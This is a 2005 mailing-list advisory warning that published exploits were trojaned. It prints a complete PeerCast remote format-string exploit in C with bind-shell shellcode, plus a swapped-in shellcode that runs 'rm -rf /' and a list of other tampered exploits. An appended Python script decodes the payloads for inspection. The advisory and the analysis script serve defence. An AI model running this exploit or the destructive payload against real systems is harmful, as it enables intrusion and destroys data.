[Full-disclosure] Beware trojaned exploits!

securitymarket_at_hush.ai
Date: 07/27/05

    Date: Tue, 26 Jul 2005 19:55:10 -0700
    To: <full-disclosure@lists.grok.org.uk>


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hackers may be at risk!

    It has come to our attention that a large amount of public
    security exploits/software have been modified and re-posted
    to legitimate trusted information sites for public downloads.

    We have recently come across 5 exploits that have had a shellcode
    modification after legitimate verification of trusted download sites.

    The following information security sites have listed a number of
    modified exploits:

    unl0ck security research
    g0tfault security
    m00 security

    Unl0ck was recently broken into by an anti-security/hacker
    organization named dikline (dikline.com ?) and ALL exploit sources
    were modified in different ways to infect the host attempting to
    exploit them.

    Numerous modified sources of "internal" / "0day" sources by a
    security group named "m00 security" have also been reported as
    modified by the dikline organization.

    We have audited numerous public exploit codes and have come up
    with some interesting results. The following is a clear example of
    modified shellcode:

    Original shellcode of the exploit "p33r-b33r.c" by unl0ck:

    /*
    \ PeerCast <= 0.1211 remote format string exploit
    / [<< Public Release >>]
    \
    / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
    \
    / uKt researcherz [ http://unl0ck.org ]
    \
    / greetz goes to: uKt researcherz.
    \
    /
    \ - smallest code - better code!!!
    /
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdarg.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>

    //*******************************************
    #define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
    }
    //*******************************************

    //****************************************************************
    char shellcode[] = // binds 4444 port
    "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
    "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
    "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
    "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
    "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
    "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
    "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f";
    //****************************************************************

    //****************************
    #define HOST "127.0.0.1"
    #define PORT 7144
    #define GOTADDR 0x0809da9c
    #define SHELLADDR 0x49adb23c
    //****************************

    //***********************************************************************
    char *
    evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
    {
    char * buf;
    unsigned char b0, b1, b2, b3;
    int start = 256;

    doit( b0, b1, b2, b3, retaddr );
    buf = (char *)malloc(999);
    memset( buf, 0, 999 );

    b3 -= figure;
    b2 -= figure;
    b1 -= figure;
    b0 -= figure;

    snprintf( buf, 999,
    "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
    b3 - 16 + start - base, offset,
    b2 - b3 + start, offset + 1,
    b1 - b2 + start, offset + 2,
    b0 - b1 + start, offset + 3 );

    return buf;
    }
    //*************************************************************************

    //*************************************************************************
    int
    main( int argc, char * argv[] )
    {
    struct sockaddr_in addr;
    int sock;
    char * fmt;
    char endian[31337], da_shell[31337];
    unsigned long locaddr, retaddr;
    unsigned int offset, base;
    unsigned char b0, b1, b2, b3;

    system("clear");
    printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n");
    printf("*^*^*^ by Darkeagle ^*^*^*\n");
    printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n");

    memset( endian, 0x00, 31337 );
    memset( da_shell, 0x00, 31337 );

    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(HOST);

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

    locaddr = GOTADDR;
    retaddr = SHELLADDR;
    offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141

    doit( b0, b1, b2, b3, locaddr );

    base = 4;
    printf("[*] Buildin' evil code\n");
    strcat(endian, "GET /html/en/index.html");
    snprintf( endian+strlen(endian), sizeof(endian),
    "%c%c%c%c"
    "%c%c%c%c"
    "%c%c%c%c"
    "%c%c%c%c",
    b3, b2, b1, b0,
    b3 + 1, b2, b1, b0,
    b3 + 2, b2, b1, b0,
    b3 + 3, b2, b1, b0 );

    fmt = evil_builder( retaddr, offset, base, 0x10 );

    memset(fmt+strlen(fmt), 0x55, 32);
    strcat(fmt, shellcode);
    strcat(endian, fmt);
    strcat(endian, "\r\n\r\n\r\n");
    printf("[+] Buildin' complete!\n");
    sprintf(da_shell, "telnet %s 4444", HOST);

    // just go, y0!
    printf("[*] Connectin'\n");
    if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) {
    printf("[-] Connection failed!\n\n");
    exit(0); }

    printf("[+] Connected!\n");
    printf("[*] Sleepin'\n");
    sleep(1);

    printf("[*] Sendin'\n");
    send(sock, endian, strlen(endian), 0);

    printf("[*] Sleepin'\n");
    sleep(1);

    printf("[*] Connectin' in da shell\n\n");
    sleep(1);
    system(da_shell);
    return 0;
    }

    ----------- Replaced modified shellcode to rm -rf remote host:

    /*
    \ PeerCast <= 0.1211 remote format string exploit
    / [<< Public Release >>]
    \
    / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ]
    \
    / uKt researcherz [ http://unl0ck.org ]
    \
    / greetz goes to: uKt researcherz.
    \
    /
    \ - smallest code - better code!!!
    /
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdarg.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <netdb.h>

    //*******************************************
    #define doit( b0, b1, b2, b3, addr ) { \
    b0 = (addr >> 24) & 0xff; \
    b1 = (addr >> 16) & 0xff; \
    b2 = (addr >> 8) & 0xff; \
    b3 = (addr ) & 0xff; \
    }
    //*******************************************

    //****************************************************************
    char shellcode[] = // binds 4444 port
    "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
    "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
    "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
    "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
    "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
    "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
    "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
    "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";
    //****************************************************************

    The above shellcode is a modified version that was found listed
    on the unl0ck security website under downloads days before the
    site went down.

    We have audited and found differences in shellcode on the following
    code:

    (POSSIBLY MANY MORE)

    unrealmagic.c - shellcode modified to rm -rf /* host
    p33r-b33r.c - shellcode modified to rm -rf /* host
    0x666-ftpd.c - shellcode modified to rm -rf /* host
    gotfault-htdead.c - shellcode modified to rm -rf /* host
    gotfault-lcdproc.c - shellcode modified to install LKM
    gotfault-newspost.c - shellcode modified to rm -rf /* host
    gotfault-ngircd.c - shellcode modified to rm -rf /* host
    gotfault-nwlpstat.c - shellcode modified to rm -rf /* host
    gotfault-openftpd-msg.c - shellcode modified to install LKM
    gotfault-pbs4q.c - shellcode modified to add password to mail users
    gotfault-putty.c - shellcode modified to install LKM
    gotfault-realmagicV2.c - shellcode modified to install LKM
    gotfault-sing.sh - shellcode modified to install unknown backdoor.
    gotfault-vmpsd.c - shellcode modified to rm -rf /* host
    gotfault-zebedee.c - shellcode modified to rm -rf /* host
    gotfault-zebedee-win32.zip - unknown
    gotfault-exim.tar.gz - shellcode modified to rm -rf /* host
    gotfault-3cdsmash.c - shellcode modified to install NEW LKM
    gotfault-psoproxy.c - shellcode modified to install LKM
    gotfault-pcwsd.c - shellcode modified to install LKM

    This is an urgent notice to all of the security individuals who have
    downloaded any of the above (and more) exploits. Please take note of
    your collections; we must find out what this dikline organization has
    backdoored and fix it!

    *** MAKE SURE to check your shellcode whenever possible.

    -----BEGIN PGP SIGNATURE-----
    Note: This signature can be verified at https://www.hushtools.com/verify
    Version: Hush 2.4

    wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA
    njACLQnU0QQDfXtKglEjX7ko5TdA
    =nU9l
    -----END PGP SIGNATURE-----


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
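The post's closing advice, check your shellcode, can be done mechanically, and the two literals quoted above are enough to show how. The script below is an added example, not code from the post or from unl0ck: it takes both shellcode literals exactly as printed, emulates the fnstenv/XOR decoder stub that the original payload begins with, and then reports the syscall reached by each int 0x80, any port pushed as a 16-bit word, and the strings the payload carries, including strings that only exist once the pushed dwords are laid out in memory. The decoder emulation is written for that one stub shape, the syscall and push tracking are byte-level heuristics for Linux/x86 shellcode rather than a disassembler, and the SYSCALL_NAMES table, the function names, and the assumption that al is zero when a mov [esp+d], al store is used to plant a NUL terminator are all this example's own.

```python
"""Added example: inspect shellcode lifted from a C exploit before running it."""
import re
import struct
# Copied verbatim from the post: the XOR-encoded bind shell, then the replacement.
ORIGINAL_LITERAL = r'''
"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85"
"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5"
"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c"
"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c"
"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86"
"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7"
"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"
'''
MODIFIED_LITERAL = r'''
"\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
"\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
"\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
"\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
"\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
"\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
"\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
"\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"
'''
SYSCALL_NAMES = {0x01: "exit", 0x0b: "execve", 0x3f: "dup2", 0x66: "socketcall"}  # our own table

def c_literal_to_bytes(literal):
    """Collapse the concatenated "\\xNN" C string pieces into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal))

# Decoder stub the original starts with: xor ecx,ecx ; sub ecx,imm8 ; fldz ;
# fnstenv [esp-0xc] ; pop ebx (= addr of fldz) ; xor dword [ebx+0x13],key ; sub ebx,-4 ; loop
DECODER_STUB = re.compile(rb"\x31\xc9\x83\xe9(.)\xd9\xee\xd9\x74\x24\xf4\x5b"
                          rb"\x81\x73\x13(....)\x83\xeb\xfc\xe2\xf4", re.DOTALL)

def decode_xor_stub(sc):
    """Emulate that loop; return stub + decoded body, or None if the stub is absent."""
    m = DECODER_STUB.search(sc)
    if not m: return None
    count, key = -struct.unpack("b", m.group(1))[0], m.group(2)  # sub ecx,-21 -> 21 dwords
    body_off = m.start() + 5 + 0x13                               # fldz is 5 bytes into the stub
    body = bytearray(sc[body_off:])
    for i in range(min(count * 4, len(body))):
        body[i] ^= key[i % 4]
    return sc[:body_off] + bytes(body)

def syscall_numbers(sc):
    """Track eax through the usual loaders and record it at each int 0x80 (byte heuristic)."""
    eax, calls, i = None, [], 0
    while i < len(sc):
        if sc[i:i + 2] == b"\xcd\x80":                      # int 0x80
            calls.append(eax); i += 2
        elif sc[i:i + 2] == b"\x31\xc0":                    # xor eax, eax
            eax, i = 0, i + 2
        elif sc[i] == 0xb0 and i + 1 < len(sc):             # mov al, imm8
            eax, i = sc[i + 1], i + 2
        elif sc[i] == 0x6a and sc[i + 2:i + 3] == b"\x58":  # push imm8 ; pop eax
            eax, i = sc[i + 1], i + 3
        elif sc[i] == 0x40 and eax is not None:             # inc eax
            eax, i = eax + 1, i + 1
        else:
            i += 1
    return calls

def pushed_stack_images(sc):
    """Memory left by each run of pushes: imm32, sign-extended imm8, or a register (assumed 0)."""
    images, cur, i = [], bytearray(), 0
    while i <= len(sc):
        op = sc[i] if i < len(sc) else None
        if op == 0x68 and i + 5 <= len(sc):                             # push imm32
            cur[0:0] = sc[i + 1:i + 5]; i += 5
        elif op == 0x6a and i + 2 <= len(sc):                           # push imm8
            cur[0:0] = struct.pack("<i", struct.unpack("b", sc[i + 1:i + 2])[0]); i += 2
        elif op is not None and 0x50 <= op <= 0x57:                     # push reg
            cur[0:0] = b"\0\0\0\0"; i += 1
        else:                                                           # run ended
            if len(cur) >= 8:
                images.append(bytes(cur))
            cur, i = bytearray(), i + 1
    return images

def c_strings(image, sc):
    """Split a stack image into C strings after applying 'mov [esp+d], al' (88 44 24 d) stores, al assumed 0."""
    image = bytearray(image)
    for m in re.finditer(rb"\x88\x44\x24(.)", sc, re.DOTALL):
        if m.group(1)[0] < len(image):
            image[m.group(1)[0]] = 0
    return [s for s in bytes(image).split(b"\0") if len(s) >= 2 and all(0x20 <= c < 0x7f for c in s)]

def summarize(sc):
    """Decode if needed, then report syscalls, 'push word' ports and strings."""
    decoded = decode_xor_stub(sc)
    code = decoded if decoded is not None else sc
    strings = set(re.findall(rb"[\x20-\x7e]{5,}", code))
    for img in pushed_stack_images(code):
        strings.update(c_strings(img, code))
    return {"encoded": decoded is not None,
            "syscalls": [SYSCALL_NAMES.get(n, "?" if n is None else hex(n)) for n in syscall_numbers(code)],
            "ports": [int.from_bytes(m.group(1), "big") for m in re.finditer(rb"\x66\x68(..)", code, re.DOTALL)],
            "strings": sorted(strings)}
```

summarize(c_literal_to_bytes(ORIGINAL_LITERAL)) reports encoded=True, four socketcall invocations (socket, bind, listen, accept) followed by dup2 and execve, port 4444 and the string /bin//sh, which is exactly what the "binds 4444 port" comment promises. summarize(c_literal_to_bytes(MODIFIED_LITERAL)) reports no decoder stub, no socket calls, no port, an execve followed by exit, and the reconstructed strings /bin/sh and rm -rf / (the -c sits behind the sixteen A bytes that are the argv pointer slots filled in at run time). The replacement kept the same "binds 4444 port" comment, so the comment tells you nothing; only the bytes do. A payload whose syscalls and strings do not match what the exploit claims to do is the point at which to stop and not run it.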

